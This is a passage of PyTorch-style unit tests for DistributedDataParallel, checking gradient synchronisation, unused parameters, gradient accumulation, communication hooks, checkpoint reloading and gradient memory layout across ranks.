2) DDP does update the grad of locally unused parameters.
"""
class GlobalLocalUnusedParamModule(nn.Module):
def __init__(self):
super(GlobalLocalUnusedParamModule, self).__init__()
self.t0 = Task()
self.t1 = Task()
self.task_unused = Task()
def task_parameters(self):
return (self.t0.p, self.t1.p, self.task_unused.p)
def forward(self, x, rank):
return self.t0(x) if rank == 0 else self.t1(x)
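# t0 participates only on rank 0 and t1 only on the other ranks (each is
# locally unused somewhere), while task_unused never participates in any
# forward pass and is therefore globally unused.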
def run_and_verify_grad(model):
# Run forward
output = model(8, self.rank)
# The grads of all parameters should be None at this point.
t0_p, t1_p, task_unused_p = model.module.task_parameters()
self.assertIsNone(t0_p.grad)
self.assertIsNone(t1_p.grad)
self.assertIsNone(task_unused_p.grad)
# Run backward
output.mean().backward()
# Now the locally unused parameters should have their grads updated on all ranks.
# However, the globally unused parameter should still have a None grad.
self.assertIsNotNone(t0_p.grad)
self.assertIsNotNone(t1_p.grad)
self.assertIsNone(task_unused_p.grad)
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
GlobalLocalUnusedParamModule().cpu(),
process_group=process_group,
find_unused_parameters=True,
gradient_as_bucket_view=gradient_as_bucket_view,
)
run_and_verify_grad(cpu_model)
# Test on GPU
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
GlobalLocalUnusedParamModule().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=True,
gradient_as_bucket_view=gradient_as_bucket_view,
)
run_and_verify_grad(gpu_model)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_global_local_unused_params_grad(self):
self._test_global_local_unused_params_grad()
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_global_local_unused_params_grad_with_grad_is_view(self):
self._test_global_local_unused_params_grad(gradient_as_bucket_view=True)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_find_unused_parameters_when_unused_parameters_empty(self):
"""
An empty unused_parameters array does not imply find_unused_parameters =
False. This test makes sure that DDP allreduces unused parameters correctly
when the forward pass in some process uses all parameters. The module used
here exercises all parameters on rank 0 and has unused parameters on the
other ranks.
"""
class FindUnusedParamModule(nn.Module):
def __init__(self):
super(FindUnusedParamModule, self).__init__()
self.t0 = Task()
self.t1 = Task()
def task_parameters(self):
return (self.t0.p, self.t1.p)
def forward(self, x, rank):
return self.t1(self.t0(x)) if rank == 0 else self.t1(x)
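# Rank 0 exercises both t0 and t1; every other rank uses only t1, so t0 is
# locally unused there even though it is used globally.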
def run_and_verify_grad(model):
# Run forward
output = model(8, self.rank)
# The grads of all parameters should be None at this point.
[self.assertIsNone(t_p.grad) for t_p in model.module.task_parameters()]
# Run backward
output.mean().backward()
# Now even the locally unused parameters should have their grads updated on all ranks.
[self.assertIsNotNone(t_p.grad) for t_p in model.module.task_parameters()]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
FindUnusedParamModule().cpu(),
process_group=process_group,
find_unused_parameters=True,
)
run_and_verify_grad(cpu_model)
# Test on GPU
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
FindUnusedParamModule().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=True,
)
run_and_verify_grad(gpu_model)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has its gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have its gradient set.
check_no_grads()
def _test_accumulate_gradients_no_sync(
self, num_iters=2, ddp_comm_hook=None, gradient_as_bucket_view=False
):
"""
This is the recommended way to implement gradient accumulation.
If a ``ddp_comm_hook`` is specified, it is also registered on the
``ddp_model``. The hook fed into this function should not change
the resulting gradients.
"""
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
local_batch_size = len(devices)
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
if ddp_comm_hook is not None:
ddp_model.register_comm_hook(process_group, ddp_comm_hook)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure gradient accumulation works under no_grad
with torch.no_grad():
with ddp_model.no_sync():
ddp_model.train()
ddp_model(input)
# check two model parameters over num_iters iterations
for iteration in range(num_iters):
# single cpu/gpu training
step_model(model, input, target)
ddp_input = input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
]
ddp_target = target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
]
if iteration % num_iters == 0:
# accumulate grads locally
with ddp_model.no_sync():
step_model(ddp_model, ddp_input, ddp_target)
else:
# sync grads
step_model(ddp_model, ddp_input, ddp_target)
for i, j in zip(model.parameters(), ddp_model.parameters()):
if iteration % num_iters == 0:
self.assertNotEqual(i.grad, j.grad)
else:
self.assertEqual(i.grad, j.grad)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync(self):
"""
Runs _test_accumulate_gradients_no_sync using default inputs
"""
self._test_accumulate_gradients_no_sync()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_grad_is_view(self):
"""
Runs _test_accumulate_gradients_no_sync using default inputs
"""
self._test_accumulate_gradients_no_sync(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_allreduce_hook(self):
"""
Runs multiple iterations of _test_accumulate_gradients_no_sync
using an allreduce hook and validates whether the future result was
properly passed as gradients to the reducer.
"""
def allreduce_hook(
process_group: object, bucket: dist.GradBucket
) -> torch._C.Future:
tensors = [bucket.get_tensor() / self.world_size]
return process_group.allreduce(tensors).get_future()
self._test_accumulate_gradients_no_sync(
num_iters=4, ddp_comm_hook=allreduce_hook
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_allreduce_with_then_hook(self):
"""
Runs multiple iterations of _test_accumulate_gradients_no_sync using an
allreduce hook that also uses then callbacks. The first then callback
multiplies the result by 2, and the second divides it by 2 * world_size.
It validates whether the final result was properly passed as gradients to
the reducer.
"""
def allreduce_with_then_hook(
process_group: object, bucket: dist.GradBucket
) -> torch.futures.Future:
fut = process_group.allreduce([bucket.get_tensor()]).get_future()
def mult(fut):
# Multiply the result by 2.
return [2 * t for t in fut.wait()]
def div(fut):
# Divide the result by 2 * world_size.
return [t / (2 * self.world_size) for t in fut.wait()]
return fut.then(mult).then(div)
self._test_accumulate_gradients_no_sync(
num_iters=4, ddp_comm_hook=allreduce_with_then_hook
)
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement gradient accumulation, but
# we would like to make sure DDP does not interfere with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure gradient accumulation works under no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_gloo()
def test_ignored_output(self):
"""
Test that the output of a model can be ignored and that there is no
implicit requirement that `backward` gets called.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
class IgnoredOutput(nn.Module):
def __init__(self):
super(IgnoredOutput, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
model = DistributedDataParallel(
IgnoredOutput().float(),
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# Run a few iterations where we ignore the output.
for _ in range(4):
output = model(input)
del output
# Run a few iterations where we use the output.
for _ in range(4):
output = model(input)
loss = criterion(output, target)
loss.backward()
@requires_gloo()
def test_ignored_output_with_unused_parameters(self):
"""
Test that the output of a model can be ignored and that there is no
implicit requirement that `backward` gets called, if not all model
parameters participated in computing the model output.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
class IgnoredOutputWithUnusedParameters(nn.Module):
def __init__(self):
super(IgnoredOutputWithUnusedParameters, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
model = DistributedDataParallel(
IgnoredOutputWithUnusedParameters().float(),
process_group=process_group,
find_unused_parameters=True,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# Run a few iterations where we ignore the output.
for _ in range(4):
output = model(input)
del output
# Run a few iterations where we use the output.
for _ in range(4):
output = model(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
        # the original one will be deleted when the first FileStore is destructed.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_save_load_checkpoint(self):
dist.init_process_group(
"gloo",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
def train_loop(model, optimizer, iterations):
for _ in range(iterations):
optimizer.zero_grad()
output = model(input)
loss = criterion(output, target)
loss.backward()
optimizer.step()
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model_withload = TestModel().float().to(device_id)
model_withoutload = TestModel().float().to(device_id)
ddp_withload = DistributedDataParallel(
model_withload,
device_ids=[device_id],
)
ddp_withoutload = DistributedDataParallel(
model_withoutload,
device_ids=[device_id],
)
        # ensure that all three models start with the same set of parameters. By default they are randomized on construction
for p in ddp_withload.parameters():
with torch.no_grad():
p.zero_()
for p in model_withload.parameters():
with torch.no_grad():
p.zero_()
for p in ddp_withoutload.parameters():
with torch.no_grad():
p.zero_()
batch_size = 4
criterion = nn.CrossEntropyLoss()
optimizer_withload = torch.optim.SGD(ddp_withload.parameters(), lr=0.001)
optimizer_non_ddp_withload = torch.optim.SGD(model_withload.parameters(), lr=0.001)
optimizer_withoutload = torch.optim.SGD(ddp_withoutload.parameters(), lr=0.001)
input = torch.rand([batch_size, 2], dtype=torch.float).to(device_id)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# run the model for 6 iterations, with a checkpoint in the middle
train_loop(ddp_withload, optimizer_withload, 3)
# zero out parameters of both DDP and non-DDP models and reload them from the DDP state dict
checkpoint_path = tempfile.gettempdir() + "/model.checkpoint"
if self.rank == 0:
torch.save(ddp_withload.state_dict(), checkpoint_path)
dist.barrier()
map_location = {"cuda:%d" % 0: "cuda:%d" % self.rank}
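        # The checkpoint was saved by rank 0, so its cuda:0 tensors are remapped onto
        # this rank's device when loading.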
ddp_state_dict = torch.load(checkpoint_path, map_location=map_location)
for model in [ddp_withload, model_withload]:
            for p in model.parameters():
with torch.no_grad():
p.zero_()
ddp_withload.load_state_dict(ddp_state_dict)
# the non-DDP model needs to first remove the prefix of "module." from the DDP state dict
torch.nn.modules.utils.consume_prefix_in_state_dict_if_present(ddp_state_dict, "module.")
model_withload.load_state_dict(ddp_state_dict)
train_loop(ddp_withload, optimizer_withload, 3)
train_loop(model_withload, optimizer_non_ddp_withload, 3)
# re-run the model with the same inputs for 6 iterations with no checkpoint
train_loop(ddp_withoutload, optimizer_withoutload, 6)
for p_withload, p_withoutload, p_non_ddp_withload in zip(
ddp_withload.parameters(), ddp_withoutload.parameters(), model_withload.parameters()
):
self.assertEqual(p_withload, p_withoutload)
self.assertEqual(p_non_ddp_withload, p_withoutload)
def _run_and_verify_sparse_gradients(self, vanilla_model, ddp_model):
mult = 2
batch_size = mult * self.world_size
criterion = nn.CrossEntropyLoss()
input = torch.randint(0, 10, [batch_size, 2])
target = torch.randint(0, 10, [batch_size])
# Run with entire batch against single process version
criterion(vanilla_model(input), target).backward()
# Run with partial batch against multi process version
partial_input = input.split(mult)[self.rank]
partial_target = target.split(mult)[self.rank]
criterion(ddp_model(partial_input), partial_target).backward()
# Check that the gradients are sparse and identical
vanilla_parameter = next(vanilla_model.parameters())
ddp_parameter = next(ddp_model.parameters())
self.assertEqual(vanilla_parameter.grad, ddp_parameter.grad)
def _test_sparse_gradients(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Ensure initialized weights and inputs are identical across processes
torch.manual_seed(1337)
vanilla_model = SparseGradientModule()
ddp_model = DistributedDataParallel(
copy.deepcopy(vanilla_model),
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
self._run_and_verify_sparse_gradients(vanilla_model, ddp_model)
@requires_gloo()
def test_sparse_gradients(self):
self._test_sparse_gradients()
@requires_gloo()
def test_sparse_gradients_grad_is_view(self):
self._test_sparse_gradients(gradient_as_bucket_view=True)
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
        # Tells _test_grad_layout to construct this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
@requires_gloo()
def test_ddp_comm_hook_future_passing_cpu(self):
"""
This unit test verifies whether the Future object is passed properly.
The callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
ModuleForDdpCommHook().cpu(), process_group=process_group
)
# Register DDP Communication Hook
cpu_model.register_comm_hook(None, self._simple_hook)
        # check whether the grads are equal to what the then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(cpu_model, 8, 2 * torch.ones(2, 2))
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
        for p in model.parameters():
            self.assertEqual(p.grad, expected_grad)
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
fut = torch.futures.Future()
fut.set_result([torch.ones_like(bucket.get_tensor())])
def fut_then(fut):
# Add ones to fut's result.
return [t + torch.ones_like(t) for t in fut.value()]
return fut.then(fut_then)
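        # Note: the future first resolves to ones, and fut_then adds ones on top, so
        # the gradients written back by the reducer should equal 2 * torch.ones(2, 2),
        # which is what the tests using this hook assert.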
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_gloo(self):
"""
This unit test verifies whether the Future object is passed properly using gloo backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether a DDP communication hook that just calls
        allreduce gives the same result as when no hook is registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(state: object, bucket: dist.GradBucket) -> torch._C.Future:
tensors = [bucket.get_tensor() / self.world_size]
return process_group.allreduce(tensors).get_future()
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE and FP16_COMPRESS
        can give the same result as when no hook is registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
for hook in [default.allreduce_hook, default.fp16_compress_hook]:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
